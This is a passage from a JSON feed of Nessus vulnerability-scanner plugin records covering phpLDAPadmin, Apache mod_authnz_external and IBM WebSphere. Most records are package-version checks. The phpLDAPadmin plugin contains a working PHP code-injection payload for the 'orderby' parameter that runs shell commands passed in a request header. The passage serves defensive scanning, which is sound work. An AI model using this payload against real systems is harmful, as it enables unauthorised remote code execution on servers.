"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:35", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-14993.NASL", "href": "https://www.tenable.com/plugins/nessus/56936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14993.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56936);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14993\");\n\n script_name(english:\"Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddff2581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:37:21", "description": "The version of phpLDAPadmin installed on the remote host does not sanitize input to the 'orderby' parameter of the 'cmd.php' script when 'cmd' is set to 'query_engine' before using it in a call to 'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute arbitrary PHP code on the affected host, subject to the privileges under 
which the web server runs.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-03T00:00:00", "type": "nessus", "title": "phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:deon_george:phpldapadmin"], "id": "PHPLDAPADMIN_ORDERBY_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/56703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56703);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"EDB-ID\", value:\"18021\");\n script_xref(name:\"EDB-ID\", value:\"18031\");\n\n script_name(english:\"phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that can be abused to\nexecute arbitrary PHP code.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of phpLDAPadmin installed on the remote host does not\nsanitize input to the 'orderby' parameter of the 'cmd.php' script when\n'cmd' is set to 'query_engine' before using it in a call to\n'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary PHP code on the affected host, subject to the privileges\nunder which the web server runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://sourceforge.net/support/tracker.php?aid=3417184\");\n # http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d5eab60\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch to 
'lib/functions.php' in the project's GIT\nrepository.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:deon_george:phpldapadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"phpldapadmin_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpLDAPadmin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE, embedded:FALSE);\n\n\ninstall = get_install_from_kb(appname:\"phpLDAPadmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig'] = \"Subnet Mask\";\n\nsemaphore = '_' + SCRIPT_NAME - '.nasl' + '_';\n\n# We need a cookie for the exploits to work.\ninit_cookiejar();\n\nurl = dir + '/';\nres = http_send_recv3(port:port, method:\"GET\", item:url, exit_on_fail:TRUE);\n\nforeach cmd (cmds)\n{\n payload = 'nessus));}}' +\n 'error_reporting(0);' +\n 'print(' + semaphore + ');' +\n 'passthru(base64_decode($_SERVER[HTTP_CMD]));' +\n 'die;/*';\n\n url = dir + '/cmd.php?' 
+\n 'cmd=query_engine&' +\n 'query=none&' +\n 'search=1&' +\n 'orderby=' + urlencode(str:payload, unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/=;<>$[]\");\n\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n add_headers : make_array(\"Cmd\", base64(str:cmd)),\n exit_on_fail : TRUE\n );\n\n if (\n semaphore >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n output = strstr(res[2], semaphore) - semaphore;\n if (!egrep(pattern:cmd_pats[cmd], string:output)) output = \"\";\n\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n\n report +=\n '\\n' + 'Note that the Cookie header in the request above uses a value' +\n '\\n' + 'returned after visiting the application\\'s initial page. 
The value' +\n '\\n' + 'reported above may have expired and need to be updated in order to' +\n '\\n' + 'validate the finding.';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The phpLDAPadmin install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:41", "description": "The remote host is affected by the vulnerability described in GLSA-201110-23 (Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize input before using it in a SQL query.\n Impact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary SQL statements by using a specially crafted username for HTTP authentication on a site using mod_authnz_external.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-26T00:00:00", "type": "nessus", "title": "GLSA-201110-23 : Apache mod_authnz_external: SQL injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mod_authnz_external", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-23.NASL", "href": "https://www.tenable.com/plugins/nessus/56635", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-23.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56635);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2688\");\n script_bugtraq_id(48653);\n script_xref(name:\"GLSA\", value:\"201110-23\");\n\n script_name(english:\"GLSA-201110-23 : Apache mod_authnz_external: SQL injection\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-23\n(Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\n input before using it in a SQL query.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary\n SQL statements by using a specially crafted username for HTTP\n authentication on a site using mod_authnz_external.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache mod_authnz_external users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-apache/mod_authnz_external-3.2.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_authnz_external\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apache/mod_authnz_external\", unaffected:make_list(\"ge 3.2.6\"), vulnerable:make_list(\"lt 3.2.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache mod_authnz_external\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:00:09", "description": "It was discovered that libapache2-mod-authnz-external, an apache authentication module, is prone to a SQL injection via the $user parameter.", "cvss3": {"score": null, "vector": null}, "published": "2011-07-20T00:00:00", "type": "nessus", "title": "Debian DSA-2279-1 : libapache2-mod-authnz-external - SQL injection", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-authnz-external", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2279.NASL", "href": "https://www.tenable.com/plugins/nessus/55624", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2279. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55624);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-2688\");\n script_bugtraq_id(48653);\n script_xref(name:\"DSA\", value:\"2279\");\n\n script_name(english:\"Debian DSA-2279-1 : libapache2-mod-authnz-external - SQL injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to a SQL injection via the $user\nparameter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=633637\"\n );\n # https://packages.debian.org/source/squeeze/libapache2-mod-authnz-external\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dce35710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2279\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libapache2-mod-authnz-external packages.\n\nFor the stable distribution (squeeze), 
this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-authnz-external\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-authnz-external\", reference:\"3.2.4-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:47", "description": "IBM WebSphere Application Server 7.0 before Fix Pack 19 appears to be running on the remote host. As such, it is potentially affected by the following vulnerabilities :\n\n - An open redirect vulnerability exists related to the 'logoutExitPage' parameter. This can allow remote attackers to trick users into requesting unintended URLs. (PM35701)\n\n - The administrative console can display a stack trace under unspecified circumstances and can disclose potentially sensitive information to local users.\n (PM36620)\n\n - The Installation Verification Tool servlet (IVT) does not properly sanitize user-supplied input of arbitrary HTML and script code, which could allow cross-site scripting attacks. (PM40733)\n\n - A token verification error exists in the bundled OpenSAML library. This error can allow an attacker to bypass security controls with an XML signature wrapping attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified parameters in the 'help' servlet. 
(PM45322)", "cvss3": {"score": null, "vector": null}, "published": "2011-09-19T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 7.0 < Fix Pack 19 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1355", "CVE-2011-1356", "CVE-2011-1359", "CVE-2011-1362", "CVE-2011-1411"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_7_0_0_19.NASL", "href": "https://www.tenable.com/plugins/nessus/56229", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56229);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2011-1355\",\n \"CVE-2011-1356\",\n \"CVE-2011-1359\",\n \"CVE-2011-1362\",\n \"CVE-2011-1411\"\n );\n script_bugtraq_id(48709, 48710, 48890, 49362);\n\n script_name(english:\"IBM WebSphere Application Server 7.0 < Fix Pack 19 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote application server may be affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"IBM WebSphere Application Server 7.0 before Fix Pack 19 appears to be\nrunning on the remote host. As such, it is potentially affected by\nthe following vulnerabilities :\n\n - An open redirect vulnerability exists related to the\n 'logoutExitPage' parameter. This can allow remote\n attackers to trick users into requesting unintended\n URLs. 
(PM35701)\n\n - The administrative console can display a stack trace\n under unspecified circumstances and can disclose\n potentially sensitive information to local users.\n (PM36620)\n\n - The Installation Verification Tool servlet (IVT) does\n not properly sanitize user-supplied input of arbitrary\n HTML and script code, which could allow cross-site\n scripting attacks. (PM40733)\n\n - A token verification error exists in the bundled\n OpenSAML library. This error can allow an attacker to\n bypass security controls with an XML signature wrapping\n attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified\n parameters in the 'help' servlet. (PM45322)\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21404665\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg27009778\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg27014463#70019\");\n # PM35701 and PM36620\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46122\");\n # PM43254\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46125\");\n # PM45322\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46125\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using WebSphere Application Server, apply Fix Pack 19 (7.0.0.19) or\nlater. 
\n\nOtherwise, if using embedded WebSphere Application Server packaged with\nTivoli Directory Server, apply the latest recommended eWAS fix pack.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8880, embedded:0);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = 
int(ver[i]);\n\nif (ver[0] == 7 && ver[1] == 0 && ver[2] == 0 && ver[3] < 19)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report =\n '\\n Source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.0.0.19' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-10T16:11:13", "description": "IBM WebSphere Application Server 8.0 before Fix Pack 1 appears to be running on the remote host and is potentially affected by the following vulnerabilities :\n\n - An open redirect vulnerability exists related to the 'logoutExitPage' parameter. This can allow remote attackers to trick users into requesting unintended URLs. (PM35701)\n\n - The administrative console can display a stack trace under unspecified circumstances and can disclose potentially sensitive information to local users.\n (PM36620)\n\n - An unspecified error exists that can allow cross-site request forgery attacks. (PM36734)\n\n - A token verification error exists in the bundled OpenSAML library. This error can allow an attacker to bypass security controls with an XML signature wrapping attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified parameters in the 'help' servlet. (PM45322)\n\n - The JavaServer Faces (JSF) application functionality could allow a remote attacker to read files because it fails to properly handle requests. (PM45992)\n\n - The HTTP server contains an error in the 'ByteRange' filter and can allow denial of service attacks when processing malicious requests. 
